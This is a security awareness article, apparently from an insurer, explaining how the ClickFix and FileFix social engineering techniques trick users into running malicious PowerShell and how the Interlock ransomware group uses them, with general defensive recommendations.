ClickFix and FileFix: How Hackers Get Victims to Infect Their Own Computers

Over time, improved security practices have effectively closed off some methods threat actors had used to gain initial access to systems. As we discussed in our recent quarterly report, though, social engineering has persisted: by attacking human weaknesses, threat actors take advantage of an element of IT security that isn’t entirely solvable through investing in new technology solutions. An example of how threat actors are expanding upon social engineering schemes is the “ClickFix” technique — and its newer cousin “FileFix” — which use seemingly helpful prompts to trick people into running malicious code, opening the door for data theft, ransomware and other attacks.

The Emergence of ClickFix

The social engineering and malware distribution technique now known as “ClickFix” first emerged in 2024 as a method of deceiving users into unwittingly downloading credential-stealing malware onto their devices. By the spring of 2025, the technique had become widespread and was additionally being used by threat actors to deploy remote access trojans (RATs), which can be used to gain initial footholds within target environments.

ClickFix campaigns can take many forms. Typically, users are directed to a malicious or compromised website via malvertising (where harmful code is injected into legitimate online advertisements) or after clicking a link contained in a phishing email. The website then presents the user with a fake CAPTCHA or fake browser error message that claims it can only be “fixed” by pressing a combination of keyboard shortcuts. Users who follow those instructions will ultimately paste malicious code into the Windows “Run” Dialog. Once the code is run, a PowerShell command downloads and executes a malware payload.

FileFix: A Dangerous New Variant 

In June 2025, a variation of the ClickFix technique — dubbed “FileFix” — was described by a security researcher. FileFix schemes are presented to the user in largely the same context as their ClickFix cousins. But rather than pasting the malicious code into the Windows “Run” Dialog, users are instead instructed to click a button that opens the Windows File Explorer, and then press a series of keyboard shortcuts that will paste the code into File Explorer’s address bar. Once executed, the malicious payload will be deployed to the user’s device.  

Why These Attacks Work—and How to Help Defend Against Them 

Threat actors have been adopting the ClickFix and FileFix techniques because they are effective. As an article from Proofpoint in 2024 explained, these techniques are particularly insidious because they are “preying on people’s innate desire to be helpful and independent.” Because users are provided with all the steps to “fix” the purported problem they are facing, they feel equipped to do so without involving their IT teams. Moreover, many common security protections are bypassed, since the victim is the one taking action on their own computer.

Interlock, a ransomware group that first emerged in September 2024 and has become a growing threat to businesses across North America and Europe, has been observed using the ClickFix and FileFix techniques to gain initial access to its victims’ environments. Those who are deceived by the method and unintentionally deploy Interlock’s RAT to their devices can find themselves subject to the group’s double extortion model, in which victims are pressured to pay a ransom to decrypt their data or to prevent it from being leaked after being exfiltrated.

For this reason, organizations should focus on educating users to recognize the ClickFix and FileFix techniques specifically — and on the general danger inherent in copying, pasting and executing commands from untrusted websites.

There are also technical safeguards to consider. Security researchers have found that certain domains are commonly abused in these schemes; these can be blocked at the firewall level (see an example of one common domain in this article). In addition to blocking certain high-risk domains, we recommend the following technical safeguards: 

• Disable command-execution using Windows Group Policy Object (GPO) settings

• Restrict the execution of unsigned PowerShell scripts using GPO settings. 

This material is for general informational purposes only and is not legal advice. It is not designed to be comprehensive and it may not apply to your particular facts and circumstances. Consult as needed with your own attorney or other professional advisor. No sponsorship, affiliation or endorsement relationship exists as between Travelers and any of the entities referenced in this material.

Further reading:

This Windows PowerShell Phish Has Scary Potential, Krebs on Security (Sept. 2024).

ClickFix: How to Infect Your PC in Three Easy Steps, Krebs on Security (Mar. 2025).

Phishing campaign impersonates Booking.com, Microsoft (Mar. 2025).

Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape, Proofpoint (Nov. 2024).

Interlock ransomware adopts new FileFix attack to push malware, Bleeping Computer (Jul. 2025).

New FileFix Delivery Method Used to Distribute Interlock RAT, Arctic Wolf (Jul. 2025).

#StopRansomware: Interlock, CISA (Jul. 2025).

Threat Actor Profile: Interlock Ransomware, Arctic Wolf (Aug. 2025).